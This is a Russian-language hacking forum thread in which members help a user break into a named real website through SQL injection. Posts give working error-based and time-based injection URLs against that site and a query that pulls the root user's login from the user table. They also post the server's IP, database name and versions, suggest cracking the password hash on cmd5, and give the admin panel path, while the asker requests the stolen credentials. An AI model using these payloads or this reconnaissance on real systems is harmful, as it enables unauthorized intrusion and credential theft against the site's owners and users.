HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.10.2015, 23:03
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

Цитата:
Сообщение от psihoz26  

Вывод ошибок есть?
да
 
Ответить с цитированием

  #2  
Старый 26.10.2015, 07:44
segodnya
Новичок
Регистрация: 26.10.2015
Сообщений: 8
С нами: 5552246

Репутация: 0
По умолчанию

нашел SQL инъекцию, попробовал через Havij , не отображает название столбцов баз данных.

скрин-шот: http://i.imgur.com/j2yMOWB.png

Сама инъекция:

Цитата:
Сообщение от None  
Вопрос, что можно сделать.
 
Ответить с цитированием

  #3  
Старый 26.10.2015, 08:38
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от qaz  

да
http://www.securitylab.ru/news/470546.php
 
Ответить с цитированием

  #4  
Старый 26.10.2015, 08:38
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от segodnya  

Вопрос, что можно сделать.
http://stop-obman.ru/websites.html?...r(extractvalue(1,concat(0x3a,vers ion())))=('1

руками надо
 
Ответить с цитированием

  #5  
Старый 26.10.2015, 08:40
segodnya
Новичок
Регистрация: 26.10.2015
Сообщений: 8
С нами: 5552246

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
спасибо, вот только не вижу, что мы вывели данным запросом.

как вывести логин / пароль id1 т.е администратора
 
Ответить с цитированием

  #6  
Старый 26.10.2015, 09:40
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от segodnya  

спасибо, вот только не вижу, что мы вывели данным запросом.
как не видешь

Цитата:
Сообщение от None  
XPATH syntax error: ':5.1.73'.
Цитата:
Сообщение от segodnya  
kак вывести логин / пароль id1 т.е администратора
это уже сам
 
Ответить с цитированием

  #7  
Старый 26.10.2015, 10:27
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

Цитата:
Сообщение от qaz  

да
https://rdot.org/forum/showpost.php?p=36186&

Тут есть пример эксплуатации
 
Ответить с цитированием

  #8  
Старый 26.10.2015, 13:20
xivi00
Познающий
Регистрация: 23.11.2013
Сообщений: 46
С нами: 6563126

Репутация: 0
По умолчанию

Цитата:
Сообщение от segodnya  

спасибо, вот только не вижу, что мы вывели данным запросом.
как вывести логин / пароль id1 т.е администратора
http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'--

Target: http://stop-obman.ru/organizations.html?rid=1

Host IP: 217.12.206.101

Web Server: nginx

Powered-by: PHP/5.3.3

DB Server: MySQL error based

Resp. Time(avg): 889 ms

Sql Version: 5.1.73

Current DB: raferti_stopobman

Host Name: rafer685.vds

Compile OS: redhat-linux-gnu

Installation dir: /usr/
 
Ответить с цитированием

  #9  
Старый 26.10.2015, 14:30
segodnya
Новичок
Регистрация: 26.10.2015
Сообщений: 8
С нами: 5552246

Репутация: 0
По умолчанию

Цитата:
Сообщение от xivi00  

http://stop-obman.ru/organizations.html?rid=1+WAITFOR+DELAY+'0:0:25'--
Target:
http://stop-obman.ru/organizations.html?rid=1
Host IP: 217.12.206.101
Web Server: nginx
Powered-by: PHP/5.3.3
DB Server: MySQL error based
Resp. Time(avg): 889 ms
Sql Version: 5.1.73
Current DB: raferti_stopobman
Host Name: rafer685.vds
Compile OS: redhat-linux-gnu
Installation dir: /usr/
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.' at line 1. The SQL statement executed was: SELECT COUNT(DISTINCT `t`.`id`) FROM `subject` `t` LEFT OUTER JOIN `organization` `rl_orgs` ON (`rl_orgs`.`subject`=`t`.`id`) WHERE (((((type='1') AND (rl_orgs.region = '1 WAITFOR DELAY '0:0:25'--')) AND (rl_orgs.country_id = '1')) AND (rl_orgs.subject=t.id)) AND (t.enable=1))

если получится, скинь логин/пароль в лс
 
Ответить с цитированием

  #10  
Старый 26.10.2015, 14:48
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

Цитата:
Сообщение от segodnya  

спасибо, вот только не вижу, что мы вывели данным запросом.
как вывести логин / пароль id1 т.е администратора
А сами не умеете вообще? учитесь.

http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1

пароль есть на cmd5

админка по адресу stop-obman.ru/backend будет

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.